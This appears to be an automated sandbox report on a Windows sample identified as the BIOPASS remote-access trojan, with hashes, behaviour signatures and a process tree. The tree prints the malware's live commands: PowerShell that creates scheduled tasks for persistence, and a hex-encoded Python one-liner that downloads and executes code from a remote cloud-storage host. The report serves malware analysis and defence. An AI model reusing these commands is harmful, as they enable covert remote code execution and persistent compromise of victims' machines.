Overview

overview

10

Static

static

10

5d7aa3474e...ba.exe

windows7_x64

10

5d7aa3474e...ba.exe

windows10_x64

10

Analysis

  • max time kernel
    78s
  • max time network
    112s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    12-07-2021 07:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    5d7aa3474e734913ecb4b820c0c546c92f7684081c519eecd3990e11a19bf2ba.exe

  • Size

    4.8MB

  • MD5

    15e8a6b8e6f7497ff3b858d3bad7f0c3

  • SHA1

    f672aa3a40647f3f1c724e1e6279e09332e5df18

  • SHA256

    5d7aa3474e734913ecb4b820c0c546c92f7684081c519eecd3990e11a19bf2ba

  • SHA512

    4857e5eaa32dca2159a25465bcb389568dc5376f79901dacd8bcc103be052e81cba2563721cf34409507b89939e2dc97ce11624e75408d6c01147db2e2635e5d

Score
10/10
biopassdiscoverypersistencerattrojan

Malware Config

Signatures

  • biopass

    BIOPASS is a RAT connected with Winnti group (APT41).

    rattrojanbiopass
  • family_biopass 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 26 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • GoLang User-Agent 3 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 6 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5d7aa3474e734913ecb4b820c0c546c92f7684081c519eecd3990e11a19bf2ba.exe
    "C:\Users\Admin\AppData\Local\Temp\5d7aa3474e734913ecb4b820c0c546c92f7684081c519eecd3990e11a19bf2ba.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3928
    • C:\Windows\system32\ping.exe
      ping www.baidu.com
      2⤵
      • Runs ping.exe
      PID:3188
    • C:\Windows\system32\cmd.exe
      cmd /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(bytes.fromhex(''696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d636e2d686f6e676b6f6e672e616c6979756e63732e636f6d2f7265732f63313232322e7478742729292e7265616428292e6465636f6465282929'').decode())\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_SETTINGS',$taskdefinition,6,$null,$null,0,$null);&& SCHTASKS /Run /TN SYSTEM_SETTINGS"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2840
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(bytes.fromhex(''696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d636e2d686f6e676b6f6e672e616c6979756e63732e636f6d2f7265732f63313232322e7478742729292e7265616428292e6465636f6465282929'').decode())\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_SETTINGS',$taskdefinition,6,$null,$null,0,$null);
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3808
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN SYSTEM_SETTINGS
        3⤵
          PID:1696
      • C:\Windows\system32\cmd.exe
        cmd /c "C:\Users\Public\vc.exe /install /quiet /norestart"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2632
        • C:\Users\Public\vc.exe
          C:\Users\Public\vc.exe /install /quiet /norestart
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:3756
          • C:\Windows\Temp\{1610B779-F48A-40D0-A566-3CF585614AB9}\.cr\vc.exe
            "C:\Windows\Temp\{1610B779-F48A-40D0-A566-3CF585614AB9}\.cr\vc.exe" -burn.clean.room="C:\Users\Public\vc.exe" -burn.filehandle.attached=520 -burn.filehandle.self=552 /install /quiet /norestart
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:3992
            • C:\Windows\Temp\{62D1904F-060A-4381-BF16-69E1621D5C50}\.be\VC_redist.x86.exe
              "C:\Windows\Temp\{62D1904F-060A-4381-BF16-69E1621D5C50}\.be\VC_redist.x86.exe" -q -burn.elevated BurnPipe.{8B5DD2A4-30B4-4727-805A-AC21D05BD88B} {0FDAC2C6-7AE4-496F-9A3A-EEDE2240BE2F} 3992
              5⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Modifies registry class
              PID:3576
      • C:\Windows\system32\cmd.exe
        cmd /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\Silverlight.exe';$action.Arguments = '';$rootFolder.RegisterTaskDefinition('SYSTEM_TEST',$taskdefinition,6,$null,$null,0,$null);&& SCHTASKS /Run /TN SYSTEM_TEST && SCHTASKS /DELETE /F /TN SYSTEM_TEST "
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3800
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\Silverlight.exe';$action.Arguments = '';$rootFolder.RegisterTaskDefinition('SYSTEM_TEST',$taskdefinition,6,$null,$null,0,$null);
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1376
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Run /TN SYSTEM_TEST
          3⤵
            PID:3576
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /DELETE /F /TN SYSTEM_TEST
            3⤵
              PID:3484
          • C:\Windows\system32\cmd.exe
            cmd /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(bytes.fromhex(''696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d636e2d686f6e676b6f6e672e616c6979756e63732e636f6d2f7265732f636461656d6f6e2e7478742729292e7265616428292e6465636f6465282929'').decode())\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_CDAEMON',$taskdefinition,6,$null,$null,0,$null);&& SCHTASKS /Run /TN SYSTEM_CDAEMON"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2624
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(bytes.fromhex(''696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d636e2d686f6e676b6f6e672e616c6979756e63732e636f6d2f7265732f636461656d6f6e2e7478742729292e7265616428292e6465636f6465282929'').decode())\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_CDAEMON',$taskdefinition,6,$null,$null,0,$null);
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3192
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Run /TN SYSTEM_CDAEMON
              3⤵
                PID:2528
          • C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe
            C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe -c "exec(bytes.fromhex('696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d636e2d686f6e676b6f6e672e616c6979756e63732e636f6d2f7265732f63313232322e7478742729292e7265616428292e6465636f6465282929').decode())" a a
            1⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:3824
          • C:\Windows\system32\vssvc.exe
            C:\Windows\system32\vssvc.exe
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1176
          • \??\c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
            1⤵
            • Checks SCSI registry key(s)
            • Modifies data under HKEY_USERS
            PID:2496
          • C:\Windows\system32\srtasks.exe
            C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3916
          • C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe
            C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe -c "exec(bytes.fromhex('696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d636e2d686f6e676b6f6e672e616c6979756e63732e636f6d2f7265732f636461656d6f6e2e7478742729292e7265616428292e6465636f6465282929').decode())" a a
            1⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:2204

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • memory/1376-196-0x0000028AF8463000-0x0000028AF8465000-memory.dmp

            Filesize

            8KB

            Download

          • memory/1376-197-0x0000028AF8466000-0x0000028AF8468000-memory.dmp

            Filesize

            8KB

            Download

          • memory/1376-195-0x0000028AF8460000-0x0000028AF8462000-memory.dmp

            Filesize

            8KB

            Download

          • memory/3192-219-0x000002D2DEA76000-0x000002D2DEA78000-memory.dmp

            Filesize

            8KB

            Download

          • memory/3192-211-0x000002D2DEA70000-0x000002D2DEA72000-memory.dmp

            Filesize

            8KB

            Download

          • memory/3192-213-0x000002D2DEA73000-0x000002D2DEA75000-memory.dmp

            Filesize

            8KB

            Download

          • memory/3808-131-0x000002B1F73F3000-0x000002B1F73F5000-memory.dmp

            Filesize

            8KB

            Download

          • memory/3808-130-0x000002B1F73F0000-0x000002B1F73F2000-memory.dmp

            Filesize

            8KB

            Download

          • memory/3808-122-0x000002B1F7360000-0x000002B1F7361000-memory.dmp

            Filesize

            4KB

            Download

          • memory/3808-127-0x000002B1F9650000-0x000002B1F9651000-memory.dmp

            Filesize

            4KB

            Download

          • memory/3808-150-0x000002B1F73F6000-0x000002B1F73F8000-memory.dmp

            Filesize

            8KB

            Download